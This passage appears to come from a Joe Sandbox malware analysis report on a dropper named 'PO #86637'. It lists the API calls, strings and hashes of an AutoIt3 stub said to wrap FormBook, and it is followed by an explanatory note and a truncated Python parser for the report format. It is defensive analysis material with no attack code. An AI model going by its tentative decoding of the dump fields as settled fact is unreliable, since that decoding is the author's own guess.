                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                      • __swprintf.LIBCMT ref: 00460915
                      • __swprintf.LIBCMT ref: 0046092D
                      • _wprintf.LIBCMT ref: 004609E1
                      Similarity
                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                      • API String ID: 3054410614-2561132961
                      APIs
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                      Similarity
                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                      • API String ID: 600699880-22481851
                      Similarity
                      • API ID: DestroyWindow
                      • String ID: static
                      • API String ID: 3375834691-2160076837
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                      Similarity
                      • API ID: ErrorMode$DriveType
                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                      • API String ID: 2907320926-3566645568
                      APIs
                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                      • DeleteObject.GDI32(C9704A85), ref: 00470A04
                      • DestroyIcon.USER32(080071CB), ref: 00470A1C
                      • DeleteObject.GDI32(02EE1C30), ref: 00470A34
                      • DestroyWindow.USER32(02EE6CF8), ref: 00470A4C
                      • DestroyIcon.USER32(?), ref: 00470A73
                      • DestroyIcon.USER32(?), ref: 00470A81
                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                      Similarity
                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                      • String ID:
                      • API String ID: 1237572874-0
                      APIs
                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                      • VariantInit.OLEAUT32(?), ref: 004793E1
                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                      • VariantClear.OLEAUT32(?), ref: 00479489
                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                      • VariantClear.OLEAUT32(?), ref: 004794CA
                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                      Similarity
                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                      • String ID:
                      • API String ID: 2706829360-0
                      APIs
                      • GetKeyboardState.USER32(?), ref: 0044480E
                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                      • GetKeyState.USER32(000000A0), ref: 004448AA
                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                      • GetKeyState.USER32(000000A1), ref: 004448D9
                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                      • GetKeyState.USER32(00000011), ref: 00444903
                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                      • GetKeyState.USER32(00000012), ref: 0044492D
                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                      • GetKeyState.USER32(0000005B), ref: 00444958
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      Similarity
                      • API ID: InitVariant$_malloc_wcscpy_wcslen
                      • String ID:
                      • API String ID: 3413494760-0
                      Similarity
                      • API ID: _strncmp
                      • String ID: '$DEFINE$\$`$h$h
                      • API String ID: 909875538-3708680428
                      • Opcode ID: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                      • Instruction ID: 816ce89e9d314c50cae2ff635e2dae77420ade2a81b985ada7b38a9c48760da0
                      • Opcode Fuzzy Hash: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                      • Instruction Fuzzy Hash: C502B470A042498FEF14CF69C9906AEBBF2FF85304F2481AED8459B341D7399946CB55
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressProc_free_malloc$_strcat_strlen
                      • String ID: AU3_FreeVar
                      • API String ID: 2634073740-771828931
                      • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                      • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                      APIs
                      • CoInitialize.OLE32 ref: 0046C63A
                      • CoUninitialize.OLE32 ref: 0046C645
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                      • IIDFromString.OLE32(?,?), ref: 0046C705
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                      • API String ID: 2294789929-1287834457
                      • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                      • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                      APIs
                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                      • ReleaseCapture.USER32 ref: 0047116F
                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                      • API String ID: 2483343779-2107944366
                      • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                      • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                      APIs
                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                      • _wcslen.LIBCMT ref: 00450720
                      • _wcscat.LIBCMT ref: 00450733
                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$Window_wcscat_wcslen
                      • String ID: -----$SysListView32
                      • API String ID: 4008455318-3975388722
                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                      • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                      • GetParent.USER32 ref: 00469C98
                      • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                      • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                      • GetParent.USER32 ref: 00469CBC
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$_memmove_wcslen
                      • String ID: ComboBox$ListBox
                      • API String ID: 2360848162-1403004172
                      • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                      • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                      • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                      • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                      • String ID:
                      • API String ID: 262282135-0
                      • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                      • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                      • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                      • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                      APIs
                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow
                      • String ID:
                      • API String ID: 312131281-0
                      • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                      • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                      • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                      • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                      APIs
                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                      • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                      • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                      • String ID:
                      • API String ID: 3771399671-0
                      • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                      • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                      • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                      • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                      • String ID:
                      • API String ID: 2156557900-0
                      • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                      • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                      • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                      • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                      • API String ID: 0-1603158881
                      • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                      • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                      • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                      • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
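The strings surfaced in the records above (AU3_FreeVar, which the AutoIt3 interpreter resolves with GetProcAddress in plugin DLLs; the @GUI_DRAGFILE and @GUI_DROPID macros; and the CLASS/CLASSNN/INSTANCE/NAME/REGEXPCLASS/TEXT control-identification properties) are AutoIt3 runtime artefacts, so the code at image base 00400000 is the compiled AutoIt stub rather than the FormBook payload itself. The following parser is an added example, not Joe Sandbox code: it reads records in this report's layout, collects each function's resolved API calls, referenced strings and originating memory dump, and reports which AutoIt markers appear. The sample text is a constructed excerpt built from records on this page; the decoding of the .sdmp name fields (base address, page protection, memory type) is my reading of the naming scheme, which matches the PAGE_* and MEM_* values the dumped sections carry.

```python
"""Parse Joe Sandbox per-function records in the layout of the dump above.

Added example for this page (not Joe Sandbox code): one record per function,
its resolved API calls, referenced strings and memory-dump region, plus the
AutoIt3 runtime strings that mark the outer PE as a compiled AutoIt script.
"""
import re
from dataclasses import dataclass, field

# Constructed excerpt in the report's own layout; API lines and strings are
# copied from records on this page, the remaining fields are trimmed away.
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc_free_malloc$_strcat_strlen
• String ID: AU3_FreeVar
• Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
APIs
• CoInitialize.OLE32 ref: 0046C63A
• CoUninitialize.OLE32 ref: 0046C645
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
• CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
Memory Dump Source
• Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
Memory Dump Source
• Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID:
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
Memory Dump Source
• Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• String ID:
• Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function X:"
API_RE = re.compile(r"•\s+(?:Part of subcall function [0-9A-F]+:\s+)?"
                    r"(\w+)\.([A-Z0-9]+)\b.*?ref: ([0-9A-F]{8})")
FIELD_RE = re.compile(r"•\s+(Source File|API ID|String ID|Instruction Fuzzy Hash):\s*(.*)")

# My reading of the .sdmp name: field 5 is the Win32 page protection, field 7 the
# memory type (0x20 for .text at 0x401000, 0x1000000 = MEM_IMAGE for a mapped PE).
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
# AutoIt3 runtime strings seen in this report's records.
AUTOIT_MARKERS = {"AU3_FreeVar", "@GUI_DRAGFILE", "@GUI_DROPID", "CLASSNN", "REGEXPCLASS"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)   # (api name, module, call-site address)
    strings: list = field(default_factory=list)
    api_id: str = ""
    source: str = ""                           # .sdmp the function was lifted from
    fuzzy_hash: str = ""


def parse_records(text):
    """Split the dump into records; the Instruction Fuzzy Hash line closes each one."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        line = line.strip()
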